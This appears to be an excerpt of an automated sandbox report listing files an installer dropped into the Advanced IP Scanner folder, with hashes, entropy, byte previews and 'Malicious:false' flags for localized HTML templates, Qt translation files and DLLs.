                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statut:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Syst.me d'exploitation:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilisateur:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commentaires:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>D.

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-11MRJ.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1149
                                                                                                                                                                                                  Entropy (8bit):4.78207214825378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoBbqsuSqrXq9CHRM9830Kt5RGDeqVReEhyv:HSbqsRqrXqgHw830U2D9Xs
                                                                                                                                                                                                  MD5:470C4551612D8025E2C1FF7129C75577
                                                                                                                                                                                                  SHA1:BA632F06A6C8A7A3E7E53FD6359BEDF2136399BB
                                                                                                                                                                                                  SHA-256:8C04F3998E1827EE98EDB0D17A591F507F75478C88B8A98DA5FABD55DDCFA18E
                                                                                                                                                                                                  SHA-512:21D3AD77522C40E2E4B5C75805EA8460EF6C1ABC4DAA7BD95E1AA7B5387DDA83589EF8A1DA6A915B975524C8B2081CEEF274AD87C3EE1E4EFD02C581D1D33A6C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-14FKM.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.97635016555389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
                                                                                                                                                                                                  MD5:3B038338C1EB179D8EEE3883CF42BC3E
                                                                                                                                                                                                  SHA1:EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
                                                                                                                                                                                                  SHA-256:C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
                                                                                                                                                                                                  SHA-512:1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-1FHUQ.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22516
                                                                                                                                                                                                  Entropy (8bit):5.64342773223904
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PojOWvws/b7HxRs55zmHpec+6V26K9lhjzy2aZ:wyWvwsT7RRs55zop7+82O
                                                                                                                                                                                                  MD5:C09D31E3E2A0F6B673F8B26AA49B8E9E
                                                                                                                                                                                                  SHA1:829B459D3642E84D0F0E0AE30D16203C583B1A88
                                                                                                                                                                                                  SHA-256:30B8FD1F756F508C00F1B27051016F58B35A9F09490C6B1376B23E37F8EC8288
                                                                                                                                                                                                  SHA-512:DA20D507F6AFE26A3EAD31C9AD2C5CDA174B8BCD907E8CB77D29F894DEE25A3567FC565C1D9155FDDDE9C2CD38AFDD1B119EC39918F0049330D4C4BE701C8884
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........E....;.......;...-...;...!...;.......;..5....O..H,...[..D....^..&5...^..Av..(5......G....|..H,..? ..K...2:..N:......V...6Q.._...I....... .......?G...y..?........_.......6......E....t.."#...t..?....t..G......2....j......5t...#..@...4s..H5..FY..f...&U......6................K...~..(....`..,....e..Gw......G........|. =...7..*.y.....*.y.....*.%...v.*.0.....+.......+.....~.+....,.+......+.....%.G.......G...."i.H0...G..Hw9.....Hw9.....I.... ..J6......J6....".J6......J6...9..LD......L.b..H..M.S..3^.R.......V....&w.Wi...G,.W.T...K.Z.|..@..[f3..C..gc....0.w0K..8...H....I......H....T...I..."..*....~..+... d..7K...T..%...2....k......F.......K..9.E..2..L.#..M..M$o...n.e.......l8...+a...^..9...I...........4.......A5......F}..>...-..>......3..%...l...;.......-..5.l..J..AV... q.y....E#...0..A.......A.......F)..tb..*................G......B.......0x......>..(....A..1V...!R.R....'..W.<..K[.f.~...@......)...1........^..*....5...=..........c..7..;6...L..q.J..>...I....o..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-1HLJL.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28199
                                                                                                                                                                                                  Entropy (8bit):4.76848600543852
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7zGw8sjK6qVziPNAsFApjRkBmPNsGYR8XQrjxpi5Qg7C/XoVsLf7ra3sEYUq:3Gw8B6qVePNAPjuYPNHAnxW7qoVsLff
                                                                                                                                                                                                  MD5:7C52599AA9F2C07DCC95378CA4BECD86
                                                                                                                                                                                                  SHA1:73831CA352BED5C6764BCB544301396C55706E6D
                                                                                                                                                                                                  SHA-256:B495F4FF61EBB88402BCD068BFD3C7EAD171CABE68C9312280F1EBAA32CCEB6F
                                                                                                                                                                                                  SHA-512:340EFFF03017538F010D7FB83BE1407E255D479A41B177189220F5D1D8D4BB6E3F668473AAAB35BFD7D8FA4742FC970E061AD0F16A1E3AE5D28DB1F0958DF1EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Z....;.......;.......;.......;..!k...;..C....O..\....[..X....^..0....^..T6..(5......G....\..H,..Q"..K...@P..N:...@..V...EA.._...].......).......QK...y..Q................x......Y....t..*....t..RH...t..\o.....AB...j...o..5t......@...C...H5..Z...f...01......F....................~..3....`..7....e..[.......\........:. =...G..*.y.....*.y...I.*.%..$..*.0..%..+.....K.+.......+....z.+......+....&..G.... {.G....+=.H0...\A.Hw9...g.Hw9.....I....(..J6....V.J6......J6......J6...I..LD......L.b..\..M.S..A..R.......V....0].Wi...[..W.T.....Z.|..S..[f3..V..gc....L.w0K..HD..H...%.......]x...T......."..5....~..7... d..F....T......2....%......[.......aW.9.E..@..L.#..c..M$o.....e.......l8...6....^..I...I....f......CH......S.......Z...>...)..>......3../...l...KL......:>.5.l..`E.AV...(m.y....X....0..T.......S.......Zc..tb..5.......................U/......=.......O..(....T\.1V...)..R....1..W.<..`..f.~..">......4...1....+...^..6%...5..............c..F..;6...bk.q.J..P...I....!..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-1K7FK.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1158
                                                                                                                                                                                                  Entropy (8bit):4.839285803199877
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKov2Fke2B2uT2Bxc+2MKb2tq2HcA2RCz282n0Kt1RhRGDbgzY1pvzAkReEs:lFouAsuSMBXqHH+lL0Kt5RGDjReEhyv
                                                                                                                                                                                                  MD5:1D24AAD630182B5018D26EE86FF9E1E5
                                                                                                                                                                                                  SHA1:D0FFCE32DEB2A2B5BD98274D2D74B135855243F1
                                                                                                                                                                                                  SHA-256:ED422482346F25140F3A4BC2B76225E64C0FB697FC4D9A0691F2B546E041D374
                                                                                                                                                                                                  SHA-512:D943A02304C8EBA2306830FCCDAEB033E7C8D9AB5F385DC57ED5AB3B08B20B8EF343F28D6DC12990B62A718B3B96885A7E9893D29A0ACA6E7FDDDD29AFD8E5F5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sustav:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Pojedinost

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-1NBI7.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1246
                                                                                                                                                                                                  Entropy (8bit):5.138597371923522
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFo/rhtCtunH/XqHH39/g/0Kt5RGDIygReEhyv:HuStyfXqHHN/g/0U2DIPs
                                                                                                                                                                                                  MD5:280FFC27B6422BD266F49BE7798DB4D9
                                                                                                                                                                                                  SHA1:203F0E4D50B553133531D25727397417BBABAA7B
                                                                                                                                                                                                  SHA-256:5DC9054AD67076F853743C7512BEC17071EF732A13B6BE5D0C18A39F7DBF32C6
                                                                                                                                                                                                  SHA-512:B446D3B2C1FA4F4D04AD62CAE6AC64023054B32669912B1586950B6C80751F99968AF7AA759EF05826D88BDB6670A1737717A1854872BF4214220BAEAC8C3311
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.......... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP-......:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC-......:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>........:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-1SUP3.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1184
                                                                                                                                                                                                  Entropy (8bit):5.02025670297611
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFo6jdsuSxFhXqNHidEy0Kt5RGDFE0GReEhyv:HZdsRDhXqNHidZ0U2DFE0ks
                                                                                                                                                                                                  MD5:5B2A97F16B2382930301E6C2C8BFF7A7
                                                                                                                                                                                                  SHA1:C66302E72DD2C5561D6187FA4276D78063915693
                                                                                                                                                                                                  SHA-256:EDB89B8D25039530B47B0893A14CA803CE2DAF9A2358489ED3C335595B1B79DF
                                                                                                                                                                                                  SHA-512:48C67FE96D43FE255156AA3DC94BFC8A6D57B39FC91B1CEF2B498CAC6914DBABB76CF32F193EF897182C6EACA3334D374B12AD53BC2242628E930A7B73C65BFC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tr.ng th.i:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>H. .i.u h.nh:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Nh. s.n xu.t:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Ng..i d.ng:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Ki.u:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Ng.y:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Nh.n x.t:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>D.ch v.</center></b></t

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-1UCPV.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26044
                                                                                                                                                                                                  Entropy (8bit):5.23160860836295
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:USrTnWGBewzY6ek4qnVBarz5QVZSp8R0SRWEN8ejwVRH9Pkq0+u3lZR:U6bWGBe96YqVBarz5QVZ1pRDOeIJtKT
                                                                                                                                                                                                  MD5:D7B6ACB98C438672B2D6E2DA7720191D
                                                                                                                                                                                                  SHA1:3F2CCE40CA80158F1A24258309E78978A8915C85
                                                                                                                                                                                                  SHA-256:DDB5D2E12292BF444B24067E959DE8EB60F7158C1FD7717433739B3E3752B539
                                                                                                                                                                                                  SHA-512:ECCE6C5D0BE732DB27EAF8AD76D425AEC6A852DC41F9501CCAF2E755B7EE42735291FB199139A196DBC017A33B2CC54018CDE8E044E1E7C972C23506C75ACB6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........R....;...L...;.......;.......;...m...;..>....O..U....[..Q0...^..+....^..Mx..(5...{..G.......H,..J...K...:...N:...b..V...?{.._...V4......%.......J....y..KI......................RV...t..'7...t..K....t..T......;....j......5t......@...=Q..H5..S...f...,.......@,.......G...........~.......`..2....e..TM......Ts.......h. =...A#.*.y.....*.y...Y.*.%..!..*.0..!..+.......+.......+....V.+......+....#..G.......G....'..H0...T..Hw9...Y.Hw9.....I....%t.J6......J6......J6....p.J6...C..LD....t.L.b..T..M.S..<..R.......V....,M.Wi...S..W.T...5.Z.|..Ls.[f3..O..gc......w0K..B*..H...".......U....T...I..."..0....~..2~.. d..@....T..*...2...........St......Y-.9.E..;:.L.#..[..M$o.....e.......l8...2....^..C...I....2......=~......M3......S3..>......>...L..3..+...l...E.......5Z.5.l..XK.AV...%5.y....Q....0..M.......L.......R...tb..1.......................N1......8h......I..(....M..1V...&B.R....-..W.<..X..f.~...D......04..1........^..1....5...y..........c..@..;6...Z=.q.J..JF..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-25469.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29651
                                                                                                                                                                                                  Entropy (8bit):5.330350785151233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ct97WPG5jbwTDnrXEPbfsDabKB2DsGM+04nMngRQpf5bLmdwmtPKP:8RWPU8nr0PY2hsGXnqxO3No
                                                                                                                                                                                                  MD5:E1A891010B901FE6055532E588E20293
                                                                                                                                                                                                  SHA1:167F62B548D6628FC1B989F6FD232BD362B59C23
                                                                                                                                                                                                  SHA-256:B20FC1BFC15F157CBDF4C04E8ABF7058FBE4549BFD92A7415A424D8BB5B8BF35
                                                                                                                                                                                                  SHA-512:AF0B8A085724DA971FF23228FAC2B04A5BF788FC3CFAD3481EF6E24A71E52348809A5E76BE287D68651F877F2A22391DE474140E8063DC1454678719B98E46F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........^....;.......;...e...;..!....;..#....;..H....O..a....[..]D...^..3....^..X...(5...A..G....F..H,..U...K...D...N:..!V..V...I..._...c,......,"......U....y..Ve......................^....t.......t..V....t..ag.....E....j..!...5t...K..@...G...H5.._q..f...3.......J................y...~..6....`..;....e..`.......`.......... =...K..*.y...,.*.y.....*.%..'..*.0..'..+.......+.......+......+....V.+....)..G...."..G.....m.H0...a).Hw9.....Hw9.....I....+..J6......J6....r.J6......J6...NQ.LD....J.L.b..a..M.S..F,.R.......V....3..Wi...`r.W.T...q.Z.|..W..[f3..[..gc......w0K..L...H...(.......b....T...q..."..8....~..;... d..J....T..1...2..........._.......f..9.E..E0.L.#..i..M$o.....e.......l8...:....^..N...I....f......G.......X......._...>......>...N..3..3#..l...P.......>..5.l..e..AV...+c.y....]....0..Yj......X[......_/..tb..9b.......c..............Y.......B.......TZ.(....Y..1V...,..R....5..W.<..f!.f.~..$t......8 ..1........^..9....5..........<...c..KF.;6...g..q.J..U@..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-2D48T.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):327208
                                                                                                                                                                                                  Entropy (8bit):6.804582730583226
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:zqg47yYJkKxQ8WVauJIg9FzQGRPvhUhcD3I95HIbPSRyuoboXHcJ2ZWa3Imr1y6a:LgTxQ3UuJIg9FzQGRPvlf
                                                                                                                                                                                                  MD5:72B2E7A9AF236E5CA0C27107E8C5690C
                                                                                                                                                                                                  SHA1:6AC273911118C7CAA71818C55E22D27B4C36B843
                                                                                                                                                                                                  SHA-256:725DD45CF413D669D22FD38BAFFB5296BD2FEC4C0379A1FA3ABA4CC12C41768A
                                                                                                                                                                                                  SHA-512:C4D217EB21501E1A26AFA5A6CB5B53152F6330A96A58B83709BE2C615594E1D640DD65E5353AD8CD2E7E3B4EABBB8E3AFF0F5D13D5577A1CCC05B590CC9803B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8.*8...8..9...8..9...8..9...8..9...8...9...8...9...8...8..8...9...8...9...8..F8...8...8...8...9...8Rich...8................PE..L...t.%^...........!.....z...j......T.....................................................@..........................}...k..............................(........7...a..T....................b.......a..@............................................text....x.......z.................. ..`.rdata...............~..............@..@.data...............................@....rsrc...............................@..@.reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-2L37T.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1155
                                                                                                                                                                                                  Entropy (8bit):4.8635515480686085
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFozSsuSxXqXH0k9/Ue/0Kt5RGD4ReEhyv:HESsRxXqXHBUM0U2DSs
                                                                                                                                                                                                  MD5:E63975AFFC0CFD1416D93982E6E0C0E8
                                                                                                                                                                                                  SHA1:28F0F8996D128E8095BE958B32F245F1EBB90D60
                                                                                                                                                                                                  SHA-256:6B385410B01F24D20294E1B92E7D391F20D146A0AAB937809483C8ED624017CA
                                                                                                                                                                                                  SHA-512:2DE0EA4CF7C1B0FBB3375A2E46677E48C7CE967954ED19B9B43DCACA462960A55969E6EB7FA51E12656F812C6768CA1E135007111BD4AAA31055847F229656D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Durum:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>..letim sistemi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.retici:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kullan.c.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.r:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tarih:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Yorumlar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Hizmet</center></b></td><td><b><center>Ayr.nt.lar</

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-2O2N8.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1153
                                                                                                                                                                                                  Entropy (8bit):4.877089271030429
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKoB2kV2B2uT2Bw2MKb2t52HcqQ2RCz282n0Kt1RhRGDbVzY1OzAkReEiWyv:lFosFsuS5XqiHJlL0Kt5RGDxReEhyv
                                                                                                                                                                                                  MD5:1D0D5C190B173CB0BED10C8B2E0F9697
                                                                                                                                                                                                  SHA1:83C10675F5A010668F4A278115BBC120F70EC99B
                                                                                                                                                                                                  SHA-256:F45A1EFA7DE1EE6ABA559166B744E6398A5BF5233EE3954E0A4BD3EB0904CE3F
                                                                                                                                                                                                  SHA-512:94E47E83159A43849DC269936D2B5E4866FB0C84DFDBB02664018CFCDBEDE06179F32324EE236910B4E2FEADC110F39EFD083A0F95B221E1D48A41A35E2C37FF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robce:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ivatel:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Pozn.mky:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnosti</ce

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-2Q7I9.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1151016
                                                                                                                                                                                                  Entropy (8bit):6.482547207070433
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
                                                                                                                                                                                                  MD5:ED04DAB88E70661E4980A284B0DF6A0C
                                                                                                                                                                                                  SHA1:C1499360A68FDC12013A6CBB35C05A3098E95F41
                                                                                                                                                                                                  SHA-256:9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
                                                                                                                                                                                                  SHA-512:E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-2QS06.tmp

                                                                                                                                                                                                  Download File
